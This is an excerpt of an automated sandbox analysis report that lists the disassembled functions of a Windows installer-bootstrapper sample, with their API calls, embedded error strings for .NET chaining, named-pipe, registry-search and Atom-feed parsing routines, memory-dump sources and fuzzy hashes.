                                                                                                                                                                                                                                                                                                  • Failed to wait for netfx chainer process to complete, xrefs: 0088D732
                                                                                                                                                                                                                                                                                                  • %ls /pipe %ls, xrefs: 0088D57F
                                                                                                                                                                                                                                                                                                  • D, xrefs: 0088D5AA
                                                                                                                                                                                                                                                                                                  • Failed to allocate netfx chainer arguments., xrefs: 0088D593
                                                                                                                                                                                                                                                                                                  • Failed to allocate section name., xrefs: 0088D51D
                                                                                                                                                                                                                                                                                                  • Failed to create netfx chainer., xrefs: 0088D55E
                                                                                                                                                                                                                                                                                                  • NetFxChainer.cpp, xrefs: 0088D4F1, 0088D5F3, 0088D6F0, 0088D728
                                                                                                                                                                                                                                                                                                  • Failed to CreateProcess on path: %ls, xrefs: 0088D5FE
                                                                                                                                                                                                                                                                                                  • Failed to create netfx chainer guid., xrefs: 0088D4C0
                                                                                                                                                                                                                                                                                                  • Failed to convert netfx chainer guid into string., xrefs: 0088D4FB
                                                                                                                                                                                                                                                                                                  • Failed to process netfx chainer message., xrefs: 0088D648
                                                                                                                                                                                                                                                                                                  • Failed to get netfx return code., xrefs: 0088D6FA
                                                                                                                                                                                                                                                                                                  • Failed to allocate event name., xrefs: 0088D53F
                                                                                                                                                                                                                                                                                                  • NetFxSection.%ls, xrefs: 0088D509
                                                                                                                                                                                                                                                                                                  • NetFxEvent.%ls, xrefs: 0088D52B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Wait$ErrorLastMutexObjectReleaseSingle$CloseCreateHandleProcess$CodeEventExitFromMultipleObjectsStringUuid
                                                                                                                                                                                                                                                                                                  • String ID: %ls /pipe %ls$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
                                                                                                                                                                                                                                                                                                  • API String ID: 1533322865-1825855094
                                                                                                                                                                                                                                                                                                  • Opcode ID: b8df5e07ee4e6d654e8c390cc7791c894ea459513768bc5a6d6534addc7936b2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 33bf8a961cf235b6b768033d5488cad1db25028540b14027515679c512dadd49
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8df5e07ee4e6d654e8c390cc7791c894ea459513768bc5a6d6534addc7936b2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05A16F72D40329ABEB21ABA8CC45B9EB7B8FB14710F114169E918FB292D7359D408F91
                                                                                                                                                                                                                                                                                                  Function 008A744A Relevance: 45.8, APIs: 13, Strings: 13, Instructions: 340COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 008A755D
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A7726
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A77C3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$FreeHeap$AllocateCompareProcess
                                                                                                                                                                                                                                                                                                  • String ID: ($@$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
                                                                                                                                                                                                                                                                                                  • API String ID: 1555028553-2592408802
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6d30e5839275b6e2c3cd43491842f25b57118882e752c5953e55c6b3bf9b926d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0d171f6d2229382e8c53d63b1cc47dcf903d3181921ed3852e470c7e0aa198b6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d30e5839275b6e2c3cd43491842f25b57118882e752c5953e55c6b3bf9b926d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6B15E31948216BBEB119BA4CC41FAEB674FB06730F200365F521E6AD1E774EE50EB90
                                                                                                                                                                                                                                                                                                  Function 008A710D Relevance: 45.8, APIs: 11, Strings: 15, Instructions: 298COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,008C3E78,000000FF,?,?,?), ref: 008A71D4
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 008A71F9
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 008A7219
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 008A7235
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 008A725D
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 008A7279
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 008A72B2
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 008A72EB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A6D50: SysFreeString.OLEAUT32(00000000), ref: 008A6E89
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A6D50: SysFreeString.OLEAUT32(00000000), ref: 008A6EC8
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A736F
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A741F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Compare$Free
                                                                                                                                                                                                                                                                                                  • String ID: ($atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 318886736-4294603148
                                                                                                                                                                                                                                                                                                  • Opcode ID: a73e19704b630ed36b9be9dd47e8f152bcc6116a7b69738411a858e39e5cdd9b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8da66fc74538750d636a2ba46d0bd2956bf42e1205e0ff879e1c2ff8c24cbd6b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a73e19704b630ed36b9be9dd47e8f152bcc6116a7b69738411a858e39e5cdd9b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FA19031909216BBEF119B54CC41FAEBA74FB06730F204365F921E6AD1D774EA10EB91
                                                                                                                                                                                                                                                                                                  Function 008754DC Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 229filepipesleepCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,?,008AB500,?,00000000,?,0086452F,?,008AB500), ref: 008754FD
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,0086452F,?,008AB500), ref: 00875508
                                                                                                                                                                                                                                                                                                  • SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0086452F,?,008AB500), ref: 0087553F
                                                                                                                                                                                                                                                                                                  • ConnectNamedPipe.KERNEL32(?,00000000,?,0086452F,?,008AB500), ref: 00875554
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086452F,?,008AB500), ref: 0087555E
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064,?,0086452F,?,008AB500), ref: 00875593
                                                                                                                                                                                                                                                                                                  • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0086452F,?,008AB500), ref: 008755B6
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0086452F,?,008AB500), ref: 008755D1
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,0086452F,008AB500,00000000,00000000,?,0086452F,?,008AB500), ref: 008755EC
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0086452F,?,008AB500), ref: 00875607
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000004,00000000,00000000,?,0086452F,?,008AB500), ref: 00875622
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086452F,?,008AB500), ref: 0087567D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086452F,?,008AB500), ref: 008756B1
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086452F,?,008AB500), ref: 008756E5
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086452F,?,008AB500), ref: 00875719
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086452F,?,008AB500), ref: 0087574A
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086452F,?,008AB500), ref: 0087577B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$crypt32.dll$pipe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2944378912-2047837012
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1526dd2e41166ed6268dbe0b1772f86cea2c9a3ad726b95a3e4b8f52e2c4b8b1
                                                                                                                                                                                                                                                                                                  • Instruction ID: b9b18fd60c4e3a4d050cb526a9f0203fcd8f12774393e2450416cc4db15f48cc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1526dd2e41166ed6268dbe0b1772f86cea2c9a3ad726b95a3e4b8f52e2c4b8b1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82710977D41639ABDB2096A88C46BEE76A8FF10B50F128125BD19FB281D7B4CD0086E1
                                                                                                                                                                                                                                                                                                  Function 0086A416 Relevance: 44.0, APIs: 8, Strings: 17, Instructions: 299registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0086A45A
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0086A480
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 0086A768
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to allocate memory registry value., xrefs: 0086A587
                                                                                                                                                                                                                                                                                                  • Failed to query registry key value size., xrefs: 0086A554
                                                                                                                                                                                                                                                                                                  • Failed to read registry value., xrefs: 0086A6F6
                                                                                                                                                                                                                                                                                                  • Failed to set variable., xrefs: 0086A72B
                                                                                                                                                                                                                                                                                                  • Failed to get expand environment string., xrefs: 0086A6DD
                                                                                                                                                                                                                                                                                                  • Unsupported registry key value type. Type = '%u', xrefs: 0086A608
                                                                                                                                                                                                                                                                                                  • Failed to format value string., xrefs: 0086A48B
                                                                                                                                                                                                                                                                                                  • Failed to open registry key., xrefs: 0086A4ED
                                                                                                                                                                                                                                                                                                  • Failed to change value type., xrefs: 0086A70F
                                                                                                                                                                                                                                                                                                  • Failed to allocate string buffer., xrefs: 0086A667
                                                                                                                                                                                                                                                                                                  • Registry key not found. Key = '%ls', xrefs: 0086A4B4
                                                                                                                                                                                                                                                                                                  • Failed to clear variable., xrefs: 0086A4D8
                                                                                                                                                                                                                                                                                                  • Failed to query registry key value., xrefs: 0086A5DA
                                                                                                                                                                                                                                                                                                  • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0086A51C
                                                                                                                                                                                                                                                                                                  • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 0086A740
                                                                                                                                                                                                                                                                                                  • Failed to format key string., xrefs: 0086A465
                                                                                                                                                                                                                                                                                                  • search.cpp, xrefs: 0086A54A, 0086A57D, 0086A5D0, 0086A6D3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open@16$Close
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2348241696-3124384294
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6e1bdc39a4ba735ac74eee5e16c8be02520c6028b740d89778737dbd9b50b78d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6089809f38ef47d7904a81ab7141030f558a8cace98030779aa902f5df87a193
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e1bdc39a4ba735ac74eee5e16c8be02520c6028b740d89778737dbd9b50b78d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14A1F132D0022ABBDB269AE8CC45EAEBA78FF05710F168121F911F6251D775DD009F93
                                                                                                                                                                                                                                                                                                  Function 00865770 Relevance: 42.5, APIs: 5, Strings: 19, Instructions: 479stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000100,00000100,00000100,00000000,00000000,00000000,?,0086A8B4,00000100,000002C0,000002C0,00000100), ref: 00865795
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(000002C0,?,0086A8B4,00000100,000002C0,000002C0,00000100), ref: 0086579F
                                                                                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 008659A7
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000100,00000000,000002C0,000002C0,00000000,000002C0,00000001,?,0086A8B4,00000100,000002C0,000002C0,00000100), ref: 00865C4A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave_wcschrlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1026845265-2050445661
                                                                                                                                                                                                                                                                                                  • Opcode ID: 26617ddd43079085f5e7241feca29fd7f1793b16e57a340f2c5a104484613402
                                                                                                                                                                                                                                                                                                  • Instruction ID: b11e6e22501d6d4c7c0acfc9476990ca362bcba040a8e9e327135bb44f82bac2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26617ddd43079085f5e7241feca29fd7f1793b16e57a340f2c5a104484613402
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EF18271901729EFDF119FA48841EAF7BA4FB05B20F168129FD15EB640D7749A01CBE1
                                                                                                                                                                                                                                                                                                  Function 0088CE81 Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 240synchronizationCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,0088D558,?,?,?), ref: 0088CEC7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0088D558,?,?,?), ref: 0088CED4
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 0088D13C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
                                                                                                                                                                                                                                                                                                  • String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
                                                                                                                                                                                                                                                                                                  • API String ID: 3944734951-2991465304
                                                                                                                                                                                                                                                                                                  • Opcode ID: dbbc3f0c3f4fd88ab37b9edc4562c1c7bf27f33eaeb2137dc8707a416e164a05
                                                                                                                                                                                                                                                                                                  • Instruction ID: 18a0637c8076793cc8b176346a6ebac10f9a8c524801ab15b9481cf1f2e26cb5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbbc3f0c3f4fd88ab37b9edc4562c1c7bf27f33eaeb2137dc8707a416e164a05
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7781F076A41726FBD721AB688809F9ABBA4FF05760F024125FE14EB381D775DC008BE5
                                                                                                                                                                                                                                                                                                  Function 0086EA42 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 231COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A32F3: VariantInit.OLEAUT32(?), ref: 008A3309
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A32F3: SysAllocString.OLEAUT32(?), ref: 008A3325
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A32F3: VariantClear.OLEAUT32(?), ref: 008A33AC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A32F3: SysFreeString.OLEAUT32(00000000), ref: 008A33B7
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,008ACA9C,?,?,Action,?,?,?,00000000,00865445), ref: 0086EB13
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 0086EB5D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to resize Detect code array in registration, xrefs: 0086EC2E
                                                                                                                                                                                                                                                                                                  • Detect, xrefs: 0086EB04
                                                                                                                                                                                                                                                                                                  • Patch, xrefs: 0086EBDD
                                                                                                                                                                                                                                                                                                  • cabinet.dll, xrefs: 0086EBBA
                                                                                                                                                                                                                                                                                                  • RelatedBundle, xrefs: 0086EA50
                                                                                                                                                                                                                                                                                                  • Failed to resize Patch code array in registration, xrefs: 0086EC43
                                                                                                                                                                                                                                                                                                  • comres.dll, xrefs: 0086EB26
                                                                                                                                                                                                                                                                                                  • Failed to get RelatedBundle element count., xrefs: 0086EA97
                                                                                                                                                                                                                                                                                                  • version.dll, xrefs: 0086EB70
                                                                                                                                                                                                                                                                                                  • Failed to resize Addon code array in registration, xrefs: 0086EC3C
                                                                                                                                                                                                                                                                                                  • Invalid value for @Action: %ls, xrefs: 0086EC52
                                                                                                                                                                                                                                                                                                  • Failed to get next RelatedBundle element., xrefs: 0086EC70
                                                                                                                                                                                                                                                                                                  • Action, xrefs: 0086EAD0
                                                                                                                                                                                                                                                                                                  • Failed to get @Id., xrefs: 0086EC62
                                                                                                                                                                                                                                                                                                  • Addon, xrefs: 0086EB9A
                                                                                                                                                                                                                                                                                                  • Failed to get @Action., xrefs: 0086EC69
                                                                                                                                                                                                                                                                                                  • Upgrade, xrefs: 0086EB50
                                                                                                                                                                                                                                                                                                  • Failed to get RelatedBundle nodes, xrefs: 0086EA72
                                                                                                                                                                                                                                                                                                  • Failed to resize Upgrade code array in registration, xrefs: 0086EC35
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$CompareVariant$AllocClearFreeInit
